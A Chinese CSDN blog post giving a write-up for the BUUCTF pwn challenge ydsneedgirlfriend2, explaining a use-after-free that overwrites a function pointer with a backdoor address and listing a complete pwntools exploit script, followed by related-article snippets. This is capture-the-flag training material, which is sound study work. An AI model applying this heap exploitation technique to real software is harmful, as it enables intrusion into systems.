[BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2

最新推荐文章于 2022-05-27 15:30:46 发布
最新推荐文章于 2022-05-27 15:30:46 发布
阅读量128 收藏
点赞数
分类专栏: # BUUCTF # 堆利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113967284
版权

[BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2

checksec看下
在这里插入图片描述
在IDA中 look look 看看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

思路

首先,利用add申请一块内存空间,并且将girlfriends[0][1], 指向print_girlfriend_name函数。将空间free之后,重新申请空间,仍是这块空间(堆的性质),这时将girlfriends[0][1]覆盖为backdoor函数地址。执行show,也就执行了backdoor函数

exploit

from pwn import *
p = remote('node3.buuoj.cn',26631)
def add(size,name):
    p.recvuntil('Please input the length of her name:\n')
    p.sendline(str(size))
    p.recvuntil('Please tell me her name:\n')
    p.sendline(name)

def delete(index):
    p.recvuntil('Index :')
    p.sendline(str(index))
def show(idx):
    p.sendlineafter('Index :',str(idx))
backdoor = 0x400d86
p.sendlineafter("u choice :\n","1")
add(0x10,'0')
p.sendlineafter("u choice :\n","2")
delete(0)
payload = p64(0) + p64(backdoor)
p.sendlineafter("u choice :\n","1")
add(0x10,payload)
p.sendlineafter("u choice :\n","3")
show(0)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
buu——girlfriend
weixin_73668856的博客
11-08 153
misc
BUUCTF misc 专题(90)[WUSTCTF2020]girlfriend
tt_npc的博客
05-27 592
下载附件,看了下提示,貌似没有什么东西,看压缩包是个音频,解压出来 听了一下,应该是电话号码的按键声,用dtmf2num 刚开始看不太懂,后面想到既然是按键,应该是有意义的,想到了九键的手机和我们现在的拼音九键差不多 根据次数去按 flag{youaremygirlfriends} ...
BUUCTF:[WUSTCTF2020]girlfriend
末初的CSDN博客
04-09 5101
下载下来一个音频文件一个题目描述 使用Audacity打开这段音频 Audacity官方下载 Audacity是一款易于使用的多轨音频编辑器和记录器,适用于Windows,Mac OS X,GNU / Linux和其他操作系统。 在CTF比赛中,可以通过对音频进行频谱的分析,以及音频其他内容的分析,找到flag。 听起来像是在打电话输入号码的声音,猜测DTMF拨号音识别,有个程序可以识别一下...
buuoj BJDCTF 2nd ydsneedgirlfriend2
pondzhang的专栏
03-30 339
free代码,free以后未置空指针 unsigned __int64 dele() { …… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); …… } 可以再次利用 from pwn import * #sh = process('./ydsneedgirlfriend2') def ad...
buuctf [BJDCTF 2nd]ydsneedgirlfriend2 UAF
carol2358的博客
05-07 614
UAF题 先申请一个看看结构 把print的位置改为backdoor的地址 先dele 申请0x10, 然后就可以覆盖print的地址了,然后show就可以跳转到backdoor exp: from pwn import * from LibcSearcher import * local_file = './ydsneedgirlfriend2' local_libc = '/li...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 357
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4553
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3967
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3093
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2015
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1866
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1355
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1251
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
Y_peak的博客
02-16 1232
[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。 栈劫持 or 栈迁移 栈劫持也可以称为栈迁移,用来解决栈本身可以利用的空间不够用,一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式,利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值